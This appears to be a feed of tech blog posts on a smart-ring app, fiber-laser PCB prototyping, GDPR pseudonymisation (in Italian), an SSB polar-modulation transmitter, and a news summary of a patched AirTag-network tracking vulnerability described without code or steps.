This program will work as long as your ring uses the QRing app – should be easy to check right in the store listing. Want to pick up the mantle and crack open the few remaining secrets? Everything is open-source, and there’s a notepad that follows the OG reverse-engineering journey, too. If you need a reminder on what this ring is cool for, here’s our original article on it.
CNC Router and Fiber Laser Bring the Best of Both Worlds to PCB Prototyping
Jack of all trades, master of none, as the saying goes, and that’s especially true for PCB prototyping tools. Sure, it’s possible to use a CNC router to mill out a PCB, and ditto for a fiber laser. But neither tool is perfect; the router creates a lot of dust and the fiberglass eats a lot of tools, while a laser is great for burning away copper but takes a long time to burn through all the substrate. So, why not put both tools to work?
Of course, this assumes you’re lucky enough to have both tools available, as [Mikey Sklar] does. He doesn’t call out which specific CNC router he has, but any desktop machine should probably do since all it’s doing is drilling any needed through-holes and hogging out the outline of the board, leaving bridges to keep the blanks connected, of course.
Once the milling operations are done, [Mikey] switches to his xTool F1 20W fiber laser. The blanks are placed on the laser’s bed, the CNC-drilled through holes are used as fiducials to align everything, and the laser gets busy. For the smallish boards [Mikey] used to demonstrate his method, it only took 90 seconds to cut the traces. He also used the laser to cut a solder paste stencil from thin brass shim stock in only a few minutes. The brief video below shows the whole process and the excellent results.
In a world where professionally made PCBs are just a few mouse clicks (and a week’s shipping) away, rolling your own boards seems to make little sense. But for the truly impatient, adding the machines to quickly and easily make your own PCBs just might be worth the cost. One thing’s for sure, though — the more we see what the current generation of desktop fiber lasers can accomplish, the more we feel like skipping a couple of mortgage payments to afford one.
youtube.com/embed/XcUxZo-ayEY?…
GDPR: Protezione o Illusione? Il Problema della Pseudonimizzazione
L’Art.4 comma 5 del GDPR recita quanto segue: ““pseudonimizzazione – il trattamento dei dati personali in modo tale che i dati personali non possano più essere attribuiti a un interessato specifico senza l’utilizzo di informazioni aggiuntive, a condizione che tali informazioni aggiuntive siano conservate separatamente e soggette a misure tecniche e organizzative intese a garantire che tali dati personali non siano attribuiti a una persona fisica identificata o identificabile”
Negli ultimi anni, la crescente attenzione verso la protezione dei dati personali ha portato a un interesse significativo verso approcci fondamentali per garantire la privacy, specialmente in un contesto in cui le informazioni personali sono sempre più raccolte e trattate da organizzazioni di ogni tipo.
Pseudonimizzazione e Anonimizzazione
Negli ultimi anni si è avuto un interesse significativo per le tecniche di pseudonimizzazione e anonimizzazione dei dati. È un errore comune confondere queste due metodologie di trattamento del dato, tuttavia, sebbene la loro differenziazione sia sottile, risulta profondamente importante nelle procedure per rendere difficile o addirittura a precludere totalmente l’identificazione di un soggetto.
Entrambi i metodi sono regolati da normative, quali il Regolamento Generale sulla Protezione dei Dati (GDPR) dell’Unione Europea, che stabilisce linea guida su come gestire i dati personali.
Nello specifico la pseudonimizzazione è quel procedimento con il quale s’impedisce l’identificazione di un individuo, consistente nel sostituire gli identificatori diretti del soggetto interessato con pseudonimi. L’anonimizzazione, invece, implica la rimozione definitiva di tutte le informazioni identificabili, rendendo impossibile l’associazione dei dei dati ad un soggetto ben determinato.
Un Approccio Organico e Integrato per la Protezione dei Dati
Pensare che la pseudonimizzazione si possa comunque raggiungere con l’ausilio di software è tuttavia rischioso; l’anonimato infatti deve essere garantito da due fronti operativi diversi ma correlati tra loro. Il primo di natura organizzativo dovrà gestire il valore del dato, disaccoppiandolo definitivamente dall’identità dell’individuo, mentre il secondo sarà da supporto, svolgendo le operazioni del caso.
Ma perché applicare tale misura?
Il GDPR già dal considerando 26 prova a fornire una spiegazione circa l’applicazione: “ L’applicazione della pseudonimizzazione ai dati personali può ridurre i rischi per gli interessati e aiutare i titolari del trattamento e i responsabili del trattamento a rispettare i loro obblighi di protezione dei dati. L’introduzione esplicita della «pseudonimizzazione» nel presente regolamento non è quindi intesa a precludere altre misure di protezione dei dati.”
Da ciò si deduce l’importante aspetto della non esclusività di applicazione, ma di integrazione al compendio delle altre misure di sicurezza sulla protezione dei dati. In ambito sanitario, cosi come in quello finanziario, questa misura assume rilevanza sia per l’utente finale che per le azienda che può continuare a usufruire del dato seppur pseudonimizzato.
Sta in questo passaggio che si trova la sostanziale differenza con l’anonimizzazione, la quale comporta la rimozione definitiva di tutte le informazioni identificabili. Sebbene infatti offra un livello di protezione della privacy più elevato, può limitare l’utilizzabilità dei dati per scopi futuri. Ovviamente il dato pseudonimizzato può correre il rischio di essere ricostruito, come specificato nel Considerando 75 del GDPR, si potrà incorrere nella “decifratura non autorizzata” sfruttando il principio del “disaccoppiamento”.
In cosa consiste il disaccoppiamento
Grazie alle numerose tecnologie, sfruttando i differenti privilegi forniti all’utente, vengono mantenuti visibili solo le informazioni strettamente necessarie oscurando le altre.
Il punto debole del sistema, risiede nella logica applicativa per lo scambio dei dati da presentare all’utente finale. Il codice applicativo dovrà essere solido e dovranno essere applicate misure di sicurezza sulle banche dati ove sono contenuti i dati.
Un approccio comune alla pseudonimizzazione è rappresentato dall’hashing, ovvero la trasformazione di una stringa di input, in una di lunghezza fissa tramite funzioni crittografiche. Questo comporta un rischio, se l’algoritmo è noto, la re-identificazione diventa possibile. Per garantire la sicurezza, il titolare del dato dovrà mantenere al sicuro l’algoritmo utilizzato, in modo da renderlo inaccessibile a soggetti non autorizzati.
Questa segregazione sarà fondamentale per preservare l’integrità del processo. Inoltre per mitigare i rischi di attacchi di forza bruta o con dizionari precalcolati, sarà necessario adottare strategie, quali la tecnica del salting ovvero l’aggiunta di un valore casuale in input prima dell’hashing.
L’Equilibrio tra Protezione dei Dati e Utilizzo Legittimo
Tra le linee guida introdotte troviamo anche il concetto di “dominio di pseudonimizzazione“. Esso definisce il contesto in cui i dati vengono trattati come pseudonimizzati, distinguendo tra due configurazioni principali.
Quello di dominio interno, in cui solo alcune unità operative all’interno di un’organizzazione hanno accesso ai dati e quello di dominio esterno, in cui i dati pseudonimizzati sono oggetto di condivisione con soggetti esterni. Se tali soggetti non dispongono delle informazioni necessarie per effettuare la de-pseudonimizzazione, i dati per loro saranno in senso proprio anonimizzati.
Una via di mezzo tra la pseudonimizzazione e l’anonimizzazione è l’oscuramento di specifiche informazioni, impedendo cosi l’accesso tramite logiche legate all’applicazione e al database che contiene i dati.
Attualmente, l’ampia interpretazione del concetto di “dato personale” porta a un’applicazione generalizzata del GDPR, anche in situazioni in cui si sottopongono i dati a processi di de-identificazioni avanzati. Questo crea oneri e rischi significativi, specialmente per startup e aziende, che spesso si trovano a sostenere costi elevati di compliance o ad abbandonare progetti di valorizzazione dei dati per timor di violare la normativa.
In un contesto in cui gli algoritmi sono in continua evoluzione e aggiornamento, la gestione dei dati personali diventa sempre più complessa e cruciale. Le tecniche di pseudoanonimizzazione e anonimizzazione devono adattarsi a queste dinamiche, rispondendo alle sfide emergenti legate alla privacy e alla sicurezza. Con l’avanzamento delle tecnologie e l’aumento della capacità di elaborazione dei dati, è fondamentale riflettere su come queste pratiche possano garantire una protezione efficace degli individui. È quindi fondamentale adottare un approccio equilibrato che consideri sia la necessità di proteggere la privacy degli individui, sia l’importanza di utilizzare i dati per scopi legittimi e utili.
L'articolo GDPR: Protezione o Illusione? Il Problema della Pseudonimizzazione proviene da il blog della sicurezza informatica.
It’s SSB, But Maybe Not Quite As You Know It
Single Sideband, or SSB, has been the predominant amateur radio voice mode for many decades now. It has bee traditionally generated by analogue means, generating a double sideband and filtering away the unwanted side, or generating 90 degree phase shifted quadrature signals and mixing them. More recent software-defined radios have taken this into the CPU, but here’s [Georg DG6RS] with another method. It uses SDR techniques and a combination of AM and FM to achieve polar modulation and generate SSB. He’s provided a fascinating in-depth technical explanation to help understand how it works.
The hardware is relatively straightforward; an SI5351 clock generator provides the reference for an ADF4351 PLL and VCO, which in turn feeds a PE4302 digital attenuator. It’s all driven from an STM32F103 microcontroller which handles the signal processing. Internally this means conventionally creating I and Q streams from the incoming audio, then an algorithm to generate the phase and amplitude for polar modulation. These are fed to the PLL and attenuator in turn for FM and AM modulation, and the result is SSB. It’s only suitable for narrow bandwidths, but it’s a novel and surprisingly simple deign.
We like being presented with new (to us at least) techniques, as it never pays to stand still. Meanwhile for more conventional designs, we’ve got you covered.
Hijacking AirTag Infrastructure To Track Arbitrary Devices
In case you weren’t aware, Apple devices around you are constantly scanning for AirTags. Now, imagine you’re carrying your laptop around – no WiFi connectivity, but BLE’s on as usual, and there’s a little bit of hostile code running at user privileges, say, a third-party app. Turns out, it’d be possible to make your laptop or phone pretend to be a lost AirTag – making it and you trackable whenever an iPhone is around.
Thenroottag
website isn’t big on details, but the paper ought to detail more; the hack does require a bit of GPU firepower, but nothing too out of the ordinary. The specific vulnerabilities making this possible have been patched in newer iOS and MacOS versions, but it’s still possible to pull off as long as an outdated-firmware Apple device is nearby!
Of course, local code execution is often considered a game over, but it’s pretty funny that you can do this while making use of the Apple AirTag infrastructure, relatively unprivileged, and, exfiltrate location data without any data connectivity whatsoever, all as long as an iPhone is nearby. You might also be able to exflitrate other data, for what it’s worth – here’s how you can use AirTag infrastructure to track new letter arrivals in your mailbox!